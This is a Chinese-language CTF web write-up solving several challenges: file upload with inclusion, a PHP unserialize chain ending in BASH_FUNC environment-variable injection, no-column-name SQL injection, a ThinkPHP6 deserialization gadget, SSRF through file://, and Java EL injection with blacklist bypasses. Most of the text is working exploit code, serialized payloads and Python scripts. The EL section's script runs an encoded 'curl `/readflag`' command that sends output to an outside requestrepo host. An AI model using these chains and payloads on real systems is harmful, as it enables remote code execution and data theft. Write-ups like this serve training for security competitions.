100%_upload
题目描述:小茂夫说:一直上传恶意文件尊嘟要生气了,世事莫固守,转变思路求突破
开题,注意有个文件包含
题目把后缀过滤死了,无法上传php后缀文件。文件内容些许过滤,短标签即可绕过。
这题文件上传+文件包含。上传txt后缀木马,直接包含即可。
Not just unserialize
题目描述:看似平平无奇的反序列化题,出题人却在dockerfile里添加了这样一行奇怪命令:RUN ln -sf /bin/bash /bin/sh……
首先分析一下题目描述:RUN ln -sf /bin/bash /bin/sh
这条Docker命令
RUN ln -sf /bin/bash /bin/sh
在构建Docker镜像时执行,用于在Linux环境下创建或更新一个符号链接,即它会将/bin/sh
指向/bin/bash
。
RUN
: Dockerfile中的指令,用于在镜像构建过程中执行命令。ln
: Linux命令,用于创建链接,包括硬链接和符号链接。-sf
:
-s
: 指定创建的是符号链接,而不是硬链接。符号链接类似于Windows中的快捷方式,指向另一个文件。-f
: 强制执行。如果目标文件(在这个例子中是/bin/sh
)已存在,它将被无提示删除并重新创建链接。这确保了即使/bin/sh
已存在,链接也会被更新为指向/bin/bash
。/bin/bash
: 这是链接的目标,即当你访问或执行/bin/sh
时,实际上是访问或执行的文件。/bin/sh
: 这是要创建或更新的符号链接的路径。在许多Linux发行版中,
/bin/sh
默认可能指向不同的Shell,如dash
或其他轻量级Shell。这个命令确保在Docker镜像中,当任何过程或脚本尝试通过
/bin/sh
执行Shell脚本时,实际使用的是Bash Shell,而不是系统默认的Shell。
开题。
源码:
<?php
highlight_file(__FILE__);
class start
{
public $welcome;
public $you;
public function __destruct()
{
$this->begin0fweb();
}
public function begin0fweb()
{
$p='hacker!';
$this->welcome->you = $p;
}
}
class SE{
public $year;
public function __set($name, $value){
echo ' Welcome to new year! ';
echo($this->year);
}
}
class CR {
public $last;
public $newyear;
public function __tostring() {
if (is_array($this->newyear)) {
echo 'nonono';
return false;
}
if (!preg_match('/worries/i',$this->newyear))
{
echo "empty it!";
return 0;
}
if(preg_match('/^.*(worries).*$/',$this->newyear)) {
echo 'Don\'t be worry';
} else {
echo 'Worries doesn\'t exists in the new year ';
empty($this->last->worries);
}
return false;
}
}
class ET{
public function __isset($name)
{
foreach ($_GET['get'] as $inject => $rce){
putenv("{
$inject}={
$rce}");
}
system("echo \"Haven't you get the secret?\"");
}
}
if(isset($_REQUEST['go'])){
unserialize(base64_decode($_REQUEST['go']));
}
?>
函数解释:
empty():
检查一个变量是否为空
判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于**
FALSE
**,那么它会被认为不存在。如果变量不存在的话,**empty()**并不会产生警告。
putenv():
设置环境变量的值
bool putenv( string $setting)
添加
setting
到服务器环境变量。 环境变量仅存活于当前请求期间。 在请求结束时环境会恢复到初始状态。设置特定的环境变量也有可能是一个潜在的安全漏洞。 safe_mode_allowed_env_vars 包含了一个以逗号分隔的前缀列表。 在安全模式下,用户可以仅能修改用该指令设定的前缀名称的指令。 默认情况下,用户仅能够修改以 PHP_ 开头的环境变量(例如 PHP_FOO=BAR)。 注意:如果此指令是空的,PHP允许用户设定任意环境变量!
safe_mode_protected_env_vars 指令包含了逗号分隔的环境变量列表,使用户最终无法通过 putenv() 修改。 即使 safe_mode_allowed_env_vars 设置允许修改,这些变量也会被保护。
反序列化最后一步利用是环境变量注入,那就讲通了,题目描述中的docker语句是为了环境变量注入做准备的:
我是如何利用环境变量注入执行任意命令 | 离别歌 (leavesongs.com)
反序列化链子:
//start::__destruct()->start::begin0fweb()->SE::__set()->CR::__tostring()->ET::__isset()
POC:
<?php
highlight_file(__FILE__);
class start
{
public $welcome;
public $you;
public function __destruct()
{
$this->begin0fweb();
}
public function begin0fweb()
{
$p='hacker!';
$this->welcome->you = $p;
}
}
class SE{
public $year;
public function __set($name, $value){
echo ' Welcome to new year! ';
echo($this->year);
}
}
class CR {
public $last;
public $newyear;
public function __tostring() {
if (is_array($this->newyear)) {
echo 'nonono';
return false;
}
if (!preg_match('/worries/i',$this->newyear))
{
echo "empty it!";
return 0;
}
if(preg_match('/^.*(worries).*$/',$this->newyear)) {
echo 'Don\'t be worry';
} else {
echo 'Worries doesn\'t exists in the new year ';
empty($this->last->worries);
}
return false;
}
}
class ET{
public function __isset($name)
{
foreach ($_GET['get'] as $inject => $rce){
putenv("{
$inject}={
$rce}");
}
system("echo \"Haven't you get the secret?\"");
}
}
//start::__destruct()->start::begin0fweb()->SE::__set()->CR::__tostring()->ET::__isset()
$a=new start();
$a->welcome=new SE();
$a->welcome->year=new CR();
$a->welcome->year->newyear="\x0aworries";
$a->welcome->year->last=new ET();
echo base64_encode(serialize($a));
?>
传参如下:(有个编码问题,是个坑)
?get[BASH_FUNC_echo%25%25]=() { tac /ffffllllllaaaaaaaaaaaaaaaaaaggggg; };
go=Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo4OiIKd29ycmllcyI7fX1zOjM6InlvdSI7Tjt9
hacker
题目描述:这好像不是简单的sql注入
开题,源码有提示
直接查询没有反应
burp打一下fuzz,发现过滤了以下部分
这题考无列名注入,可以看我的文章(才发现这篇访问有9k啊啊啊):NSS [HNCTF 2022 WEEK2]easy_sql_nss上的sql-CSDN博客
payload:
1'/**/union/**/select/**/`2`/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)xxx%23
Oyst3rPHP
题目描述:I think that Oyst3rphp is the best
开题,看饿了
没啥发现,骚一波看看,收获满满
源码readme发现是TP6
工具检测不到
所以我们再看看源码。估计有部分改动,我们要手动打。
/app/controller/index.php
<?php
namespace app\controller;
use app\BaseController;
class Index extends BaseController
{
public function index()
{
echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
echo "<img src='../Oyster.png'"."/>";
$payload = base64_decode(@$_POST['payload']);
$right = @$_GET['left'];
$left = @$_GET['right'];
$key = (string)@$_POST['key'];
if($right !== $left && md5($right) == md5($left)){
echo "Congratulations on getting your first oyster";
echo "<img src='../Oyster1.png'"."/>";
if(preg_match('/.+?THINKPHP/is', $key)){
die("Oysters don't want you to eat");
}
if(stripos($key, '603THINKPHP') === false){
die("!!!Oysters don't want you to eat!!!");
}
echo "WOW!!!Congratulations on getting your second oyster";
echo "<img src='../Oyster2.png'"."/>";
@unserialize($payload);
//最后一个生蚝在根目录,而且里面有Flag???咋样去找到它呢???它的名字是什么???
//在源码的某处注释给出了提示,这就看你是不是真懂Oyst3rphp框架咯!!!
//小Tips:细狗函数┗|`O′|┛ 嗷~~
}
}
public function doLogin()
{
/*emmm我也不知道这是what,瞎写的*/
if ($this->request->isPost()) {
$username = $this->request->post('username');
$password = $this->request->post('password');
if ($username == 'your_username' && $password == 'your_password') {
$this->success('Login successful', 'index/index');
} else {
$this->error('Login failed');
}
}
}
}
注意这里有一个反序列化点,猜测反序列化可以直接利用。
我们只需要绕一下md5弱比较和正则回溯限制就行。由于回溯限制包比较大,我们直接用脚本发包。
import requests
url = "http://yuanshen.life:38909/?left=s878926199a&right=s1091221200a"
data ={
"key":'.'*1000100+"603THINKPHP","payload":"【xxx】"}
r = requests.post(url,data).text
print(r)
TP6利用链子:
<?php
namespace think\model {
use think\Model;
class Pivot extends Model {
}
}
namespace think {
abstract class Model {
private $lazySave = false;
private $data = [];
protected $withEvent = true;
private $exists = false;
private $force = false;
protected $table;
private $withAttr = [];
public function __construct($obj = '') {
$this->lazySave = true;
$this->data = array('Jay17'=>'cat /Oyst3333333r.php');
$this->withEvent = false;
$this->exists = true;
$this->force = true;
$this->table = $obj;
$this->withAttr = array('Jay17'=>'system');
}
}
}
namespace {
use think\model\Pivot;
echo base64_encode(serialize(new Pivot(new Pivot())));
}
flag在/Oyst3333333r.php
(卡了好久。。)
最后POC:
import requests
url = "http://yuanshen.life:38909/?left=s878926199a&right=s1091221200a"
data ={
"key":'.'*1000100+"603THINKPHP","payload":"TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjc6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6NToiSmF5MTciO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MTI6IgAqAHdpdGhFdmVudCI7YjowO3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjg6IgAqAHRhYmxlIjtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Nzp7czoyMToiAHRoaW5rXE1vZGVsAGxhenlTYXZlIjtiOjE7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo1OiJKYXkxNyI7czoyMToiY2F0IC9PeXN0MzMzMzMzM3IucGhwIjt9czoxMjoiACoAd2l0aEV2ZW50IjtiOjA7czoxOToiAHRoaW5rXE1vZGVsAGV4aXN0cyI7YjoxO3M6MTg6IgB0aGlua1xNb2RlbABmb3JjZSI7YjoxO3M6ODoiACoAdGFibGUiO3M6MDoiIjtzOjIxOiIAdGhpbmtcTW9kZWwAd2l0aEF0dHIiO2E6MTp7czo1OiJKYXkxNyI7czo2OiJzeXN0ZW0iO319czoyMToiAHRoaW5rXE1vZGVsAHdpdGhBdHRyIjthOjE6e3M6NToiSmF5MTciO3M6Njoic3lzdGVtIjt9fQ=="}
r = requests.post(url,data).text
print(r)
EZ_SSRF
题目描述:送你们点分,flag位于/flag哦~
直接给了源码:
<?php
highlight_file(__file__);
error_reporting(0);
function get($url) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($curl);
curl_close($curl);
echo base64_encode($data);
return $data;
}
class client{
public $url;
public $payload;
public function __construct()
{
$url = "http://127.0.0.1/";
$payload = "system(\"cat /flag\");";
echo "Exploit";
}
public function __destruct()
{
get($this->url);
}
}
// hint:hide other file
if(isset($_GET['Harder'])) {
unserialize($_GET['Harder']);
} else {
echo "You don't know how to pass parameters?";
}
?>
flag不在/flag
。payload变量不会执行,我们注意力放在url变量上,file协议直接读。
POC:
<?php
highlight_file(__file__);
error_reporting(0);
function get($url) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($curl);
curl_close($curl);
echo base64_encode($data);
return $data;
}
class client{
public $url;
public $payload;
public function __construct()
{
$url = "http://127.0.0.1/";
$payload = "system(\"cat /flag\");";
echo "Exploit";
}
public function __destruct()
{
get($this->url);
}
}
$a=new client();
$a->url='file:///var/www/html/flag.php';
echo serialize($a);
payload:
?Harder=O:6:"client":2:{s:3:"url";s:29:"file:///var/www/html/flag.php";s:7:"payload";N;}
base64解码
[进阶]elInjection
题目描述:快写个exp打死我!
hint:
利用ScriptEngine基础上可以使用Base64编码Bypass
非预期解法dns出网情况下,dns换行导致解析失败可以使用命令,ls /|head -n 1|tail -n -1,来读取行数
flag没有权限读取,执行/readflag获取
套双层ScriptEngineManager的eval执行java.util.Base64解码内容
开题
IDEA反编译一下看看,源码如下:
package com.example.elinjection.controller;
import de.odysseus.el.ExpressionFactoryImpl;
import de.odysseus.el.util.SimpleContext;
import java.util.ArrayList;
import java.util.Iterator;
import javax.el.ExpressionFactory; // EL表达式工厂的基类,用于创建值表达式和方法表达式
import javax.el.ValueExpression; // 表示带有获取和设置功能的表达式
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.bind.annotation.RestController;
// 使用@RestController注解,自动处理响应体的序列化,并将该类标记为Spring MVC控制器
@RestController
public class TestController {
// 定义无参构造函数,通常用于初始化操作,这里未进行具体操作
public TestController() {
}
// 使用@RequestMapping注解映射"/test"路径的HTTP请求到该方法,@ResponseBody指示返回值为响应体
@RequestMapping({
"/test"})
@ResponseBody
public String test(@RequestParam(name = "exp") String exp) {
// 创建一个字符串列表,存储被认为可能执行危险操作的字符串
ArrayList<String> list = new ArrayList();
list.add("Runtime");
list.add("exec");
list.add("invoke");
list.add("exec");
list.add("Process");
list.add("ClassLoader");
list.add("load");
list.add("Response");
list.add("Request");
list.add("Base64Utils");
list.add("ReflectUtils");
list.add("getWriter");
list.add("Thread");
list.add("defineClass");
list.add("bcel");
list.add("RequestAttributes");
list.add("File");
list.add("flag");
list.add("URL");
list.add("Command");
list.add("Inet");
list.add("System");
list.add("\\u");
list.add("\\x");
list.add("'");
// 使用迭代器遍历上面创建的字符串列表
Iterator var3 = list.iterator();
String s;
// 循环检查输入的表达式中是否包含列表中的任何字符串
do {
if (!var3.hasNext()) {
//遍历结束,没有黑名单内字符串
// 如果输入的表达式不包含任何敏感字符串,则使用EL处理输入的表达式
ExpressionFactory expressionFactory = new ExpressionFactoryImpl();
SimpleContext simpleContext = new SimpleContext();
// 创建一个值表达式,用于在给定的上下文中评估exp
ValueExpression valueExpression = expressionFactory.createValueExpression(simpleContext, exp, String.class);
// 获取并执行表达式的值,但是这里没有使用执行结果
valueExpression.getValue(simpleContext);
// 返回原始的表达式字符串
return exp;
}
// 如果找到敏感字符串,则将s设置为该字符串
s = (String)var3.next();
} while(!exp.contains(s));
// 如果输入表达式包含任何敏感字符串,返回"No"
return "No";
}
}
在源码中发现其会使用EL处理输入的表达式
。不难联想到Java安全中的EL表达式注入。
参考文章:
EL表达式全称Express Language,语法:${EL表达式}
EL表达式默认为启用,jsp会解析EL表达式,除非配置<%@ page isELIgnored ="true|false" %>
,或者是全局pom.xml设置如下代码
<jsp-config>
<jsp-property-group>
<url-pattern>*.jsp</url-pattern>
<el-ignored>true</el-ignored>
</jsp-property-group>
</jsp-config>
EL表达式注入:外部输入可控、输入会被解析从而造成注入漏洞
主要的注入表达式(利用):
// 获取环境变量
${
applicationScope}
// 获取web绝对路径
${
pageContext.servletContext.getResource("")}
// 命令执行
${
pageContext.setAttribute("a", Runtime.getRuntime().exec("calc"))}
绕过防御方式:
1、反射
通常直接rce是不行的,通常会用到反射
${
pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"calc.exe"))}
2、js引擎rce
${
''.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('calc')")}
3、String类动态生成命令字符串(ASCII)
对于命令被明文过滤的情况
// 字符串 wh,多个cocnat嵌套构造whoami
//->
java.lang.Character.toString(119).concat(java.lang.Character.toString(104))
true.toString().charAt(0).toChars(119)[0].toString().concat(true.toString().charAt(0).toChars(104)[0].toString())
4、base64编码绕过
.exec(cmd)
//->
.exec("bash -c {echo,"+base64.b64encode(cmd).decode()+"}|{base64,-d}|{bash,-i}")
5、套双层eval
${
"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("function myfuc(a){ return eval(a)};myfuc(String.fromCharCode(106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,39,98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,89,121,65,105,89,51,86,121,98,67,66,103,76,51,74,108,89,87,82,109,98,71,70,110,89,67,53,107,89,51,90,108,101,72,108,114,78,121,53,121,90,88,70,49,90,88,78,48,99,109,86,119,98,121,53,106,98,50,48,105,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125,39,41))")}
//106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,39,98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,89,121,65,105,89,51,86,121,98,67,66,103,76,51,74,108,89,87,82,109,98,71,70,110,89,67,53,107,89,51,90,108,101,72,108,114,78,121,53,121,90,88,70,49,90,88,78,48,99,109,86,119,98,121,53,106,98,50,48,105,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125,39,41
//【解码后】java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtYyAiY3VybCBgL3JlYWRmbGFnYC5kY3ZleHlrNy5yZXF1ZXN0cmVwby5jb20i}|{base64,-d}|{bash,-i}')
由于源码过滤,我们绕过方式选用js引擎rce+ASCII+base64编码绕过(上文234)
具体利用方式见python脚本:
import requests
import base64
def encode(payload):
encode_payload = ""
for i in range(0, len(payload)):
if i == 0:
encode_payload += "true.toString().charAt(0).toChars(%d)[0].toString()" % ord(payload[0])
else:
encode_payload += ".concat(true.toString().charAt(0).toChars(%d)[0].toString())" % ord(payload[i])
return encode_payload
cmd = b"curl `/readflag`.dcvexyk7.requestrepo.com"
bs_cmd=base64.b64encode(cmd).decode()
ASC_bs_cmd=encode("java.lang.Runtime.getRuntime().exec(\"bash -c {echo,"+base64.b64encode(cmd).decode()+"}|{base64,-d}|{bash,-i}\")")
#print(ASC_bs_cmd)
exp = '${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval('+ASC_bs_cmd+')}'
#print(exp)
url = "http://yuanshen.life:23333/test"
data = {
'exp': exp}
r = requests.post(url, data).text
print(r)
网上其他的payload:
1、套双层eval,这个应该是预期解
exp=${
"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("function test(a){ return eval(a)};test(String.fromCharCode(106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,39,98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,89,121,65,105,89,51,86,121,98,67,66,103,76,51,74,108,89,87,82,109,98,71,70,110,89,67,53,121,98,122,100,111,77,88,107,117,89,50,86,53,90,83,53,112,98,121,73,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125,39,41))")}
2、使用了 Yakit Fuzzer 语法(后生不才,没怎么看懂)
{
{
url(${
"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("eval(java.net.UR".concat("LDecoder.decode(\"{
{url({
{p(javascript)}})}}\"))"))})}}
接下来就是 javascript
变量了, 出题人说直接读 /readflag
, 同时机器只有 DNS 出网, 于是我们使用 DNSLOG 外带
构造
curl `/readflag`.fagjd.z9z.topcontent_copy
然后处理一下得到
java.lang.Runtime.getRuntime().exec("bash -c {echo,Y3VybCBgL3JlYWRmbGFnYC5mYWdqZC56OXoudG9w}|{base64,-d}|{bash,-i}").getInputStream();content_copy
之后拿到 flag
[进阶]CC_deserialization【*】
题目描述:最近jack想学cc链,他请教了一位师傅,师傅为了考验他的能力,给了他一个网址和jar包,让他拿到地址中的flag,可是jack拿到网址后一脸懵逼,所以来找你求救,你能帮助他吗?(jdk版本1.8.0_65)
hint:
jdk版本1.8.0_65
cc1下半段TransformedMap动态代理,想办法不用LazyMap
AnnotationInvocationHandler.readObject->AbstractInputCheckedMapDecorator.setValue->TransformedMap.checkSetValue->AbstractInputCheckedMapDecorator.setValue->TransformedMap.checkSetValue->InvokerTransformer.transform然后走rmi二次反序列化
先把jar包用IDEA打开看看。用的是CC1
先打一下URLDNS,看看出网否,出网。
exp=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//3QAGGRjdmV4eWs3LnJlcXVlc3RyZXBvLmNvbXQAAHEAfgAFdAAEaHR0cHB4dAAfaHR0cDovL2RjdmV4eWs3LnJlcXVlc3RyZXBvLmNvbXg=
md不会啊…最后也没人解出,该不会之后比赛还会遇到吧呜呜呜